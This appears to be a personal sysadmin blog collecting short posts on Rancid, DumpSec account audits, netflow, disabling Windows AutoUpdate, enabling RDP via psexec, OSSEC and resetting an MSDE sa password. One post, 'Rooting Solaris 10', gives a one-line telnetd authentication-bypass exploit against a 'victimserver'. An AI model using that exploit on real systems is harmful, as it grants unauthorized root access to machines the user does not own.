Configuration Management with Rancid

Hey folks!

Dont you guys think it is a very tedious process to keep track of your networking devices configuration. Yah you know.. > copy run-config/start-config tftp ip.address .

So, instead of wasting my time doing that manually, i use Rancid + CVSWeb to monitor and keep track of my cisco devices configuration changes. As usual, my favorite platform is FreeBSD. The installation process can be referred to this tutorial.

After installation, several configurations need to be made especially, ~/.cloginrc which stored all your authentication method and password and also router.db that stored information about the router. In .cloginrc you can define what type of login method that you want to use, either telnet or SSH. For example:

add type ssh ip.of.the.router
add password ip.of.the.router passwordbongok passwordbongek

To test wether it's working or not, you can use a tool which is part of rancid, clogin.

$ clogin ip.of.the.router

if you can login and manage to get into global and configuration mode. Then you're good. After that all you need to start your rancid by typing rancid-run. Here is the screenshot of my cvsweb.



So the last step is to make sure every hour rancid will check for configuration changes on the routers. So all you need is crontab.

@hourly /usr/local/bin/rancid/rancid-run . Thats it.

Auditing users Account in Windows 2003

It have been a very very long time...

I've been assigned to list user ID, their group, Lock status and Active status. So I used this tools from Somarsoft called Dumpsec with a little bit help from unixtools.

Here is the tricks:

1. Dumpsec.exe /computer=\\computer.ip /rpt=users /saveas=csv outfile=c:\fileku.txt . It will produce something like below

3/16/2007 3:47 PM - Somarsoft DumpSec (formerly DumpAcl) - \\computer.ip
****Name,FullName,AccountType,Comment,HomeDrive,HomeDir,Profile,LogonScript,
Workstations,PswdCanBeChanged,PswdLastSetTime,PswdRequired,PswdExpires,
PswdExpiresTime,AcctDisabled,AcctLockedOut,AcctExpiresTime,
LastLogonTime,LastLogonServer,LogonHours,RasDialin,RasCallback,RasCallbackNumber

*********,,****,Built-in account for administering the computer/domain,,,,,,Yes,3/23/2006 3:52 PM,Yes,No
,Never,No ,No ,Never,4/12/2006 10:37 AM,10.20.201.13,All,No ,None,
***,***,***,,,,,,,Yes,8/21/2006 10:19 AM,Yes,No ,Never,No ,No ,Never,Never,10.20.201.13,All,No ,None,
Guest,,****,Built-in account for guest access to the computer/domain,,,,,,No ,3/7/2007 9:12 AM,No ,No ,Never,Yes,No ,Never,Never,10.20.201.13,All,No ,None,
SQLDebugger,SQLDebugger,****,This **** account is used by the Visual Studio .NET Debugger,,,,,,No ,2/15/2006 5:02 PM,Yes,No ,Never,No ,No ,Never,Never,10.20.201.13,All,No ,None,
SUPPORT_388945a0,CN=Microsoft Corporation,L=Redmond,S=Washington,C=US,****,This is a vendor's account for the Help and Support Service,,,,,,No ,2/10/2006 11:06 AM,Yes,No ,Never,Yes,No ,Never,Never,10.20.201.13,All,No ,None,
****,,****,Built-in account for administering the computer/domain,,,,,,Yes,10/4/2006 4:31 PM,Yes,No ,Never,No ,No ,Never,3/1/2007 3:22 PM,10.20.201.13,All,No ,None,

All i need is field no 1,2,15 and 16 so i did this. (Actually there are several way to do this, one of it to use awk)

2. cat c:\fileku.txt | cut -d "," -f1,2,15,16 >> listuser.csv . So here is the result.

3/13/2007 4:01 PM - Somarsoft DumpSec (formerly DumpAcl) - \\computer.ip
****Name,FullName,AccountType,AcctDisabled,AcctLockedOut

ASPNET,ASP.NET Machine Account,****,No ,No
******,******,****,No ,No
Guest,,****,Yes,No
*******,Internet Guest Account,****,No ,No
SQLDebugger,SQLDebugger,****,No ,No
SUPPORT_388945a0,CN=Microsoft Corporation,L=Redmond,Yes,No
****,,****,No ,No

So who said MS Windows is boring? Operating System is just a tool, be it Solaris, BSD, Windows, Linux or whatever it is, all you need is knowledge to make it fun!

Rooting Solaris 10

Rooting Solaris 10 is seemed like an impossible mission but not when you have telnetd running on that solaris machine. Hey!! I tought we're living in 2007 and supposely telnetd should be long gone replaced by SSHD. :=D


telnet -l "-froot" victimserver



Peace yall!

Why netflow?

Recently, we're facing with network congestion, especially on our Wan Link.


We tried to find the culprit for this problem, but nothing much came out of cacti and ntop. So we decided to download and test this netflow reporting tools called Netflow tracker from Crannog Software. The installation is very easy, and we managed to find the cause of the trouble in just few minutes.


After identifying the source of problem, we decided to disconnect the server from the network. Traffic flow back to normal.

Disabling Windows Autoupdate

If you have a patch management system, you dont need to enable AutoUpdate service. Why?

1. Reduce bandwidth consumption, instead of every machine connecting and downloading from *microsoft.com, now all you need is one centralize server.
2. Reduce logging noise in network devices especially firewall
3. Reduce resources usage since less services running automatically.

So how to do it?

I use GNU Awk and must run as domain administrator.

1. net view | gawk " { print $1 } > hostlist
2. for /f %i in (hostlist) do sc \\%i stop wuauserv
3. for /f %i in (hostlist) do sc \\%i config start= disabled


Thats it.

Enabling Windows Remote Desktop using command line

Sometime u need to access remote windows machine by RDP, but the problem is, RDP is not enable by default. Using psexec and reg add, you can enable RDP remotely.

psexec \\computername -u username reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0

OSSEC HIDS + Web Interface

After testing several HIDS like samhain, osiris i decided to give OSSEC a try. BTW, what the heck is OSSEC? OSSEC is an Open Source Host-based Intrusion Detection System. It performs log analysis, integrity checking, Windows registry monitoring, rootkit detection, time-based alerting and active response. The reason i pick OSSEC not samhain or osiris, because of it's simplicity.

Ossec is a client-server solution. So u need a server and clients. My server run on FreeBSD and clients run on windows/Linux/Solaris/Bsd. The installation process is very straight forward, so please visit here.

For monitoring purpose, i use ossec-wui, a web based interface for alerting. Installation also very straight forward, except that, i cant view alert from ossec logs file. I already add apache user into ossec group (edit /etc/group), but the result still the same. From Ossec mailing list, one of the guy pointed out that os_lib_alerts.php does not return the right user group. For solution, i need to comment that line.

/* Getting group information */ $evt_group = strstr($buffer, "-"); if($evt_group === FALSE) { /* Invalid group */ continue; => comment this line }


So, now my ossec-wui work like a charm. Heres the screenshot.


Further googling show that, i need to upgrade my OSSEC from 0.93 to 1.0 in order to overcome this problem. Without very much hesitation, i download the latest version and run ./setup.sh . Thats it . Job done for today.

Reset "sa" in MSDE

Yeah, shit does happen especially when you dont plan properly. I forgot my MSDE password that store most of EventViewer alerts. Luckily, Builtin administrator accounts can be used to reset MSDE password. Here's the trick:

osql -E -d databasename -Q "sp_password NULL, 'newpassword', 'sa'"

-E to use trusted connection
-Q to execute query and exit

for more option, run osql /?